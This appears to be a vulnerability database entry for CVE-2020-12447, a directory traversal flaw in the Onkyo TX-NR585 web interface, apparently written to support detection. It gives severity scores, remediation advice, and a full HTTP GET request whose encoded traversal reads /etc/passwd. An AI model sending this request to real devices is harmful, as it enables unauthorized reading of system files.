🔙 목록으로 돌아가기

CVE-2020-12447: Onkyo TX-NR585 Web Interface - Directory Traversal

TitleOnkyo TX-NR585 Web Interface - Directory Traversal
Author0x_Akoko
SeverityHigh
ImpactAn attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation.
RemediationApply the latest firmware update provided by the vendor to fix the directory traversal vulnerability.
CVSS Score7.5
EPSS Score0.79818
CVE IDCVE-2020-12447
CWE IDCWE-22
Tags cve cve2020 onkyo lfi traversal vuln

🔍 Vulnerability Description

Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.

🌐 HTTP Request

GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-12447.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-12447.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A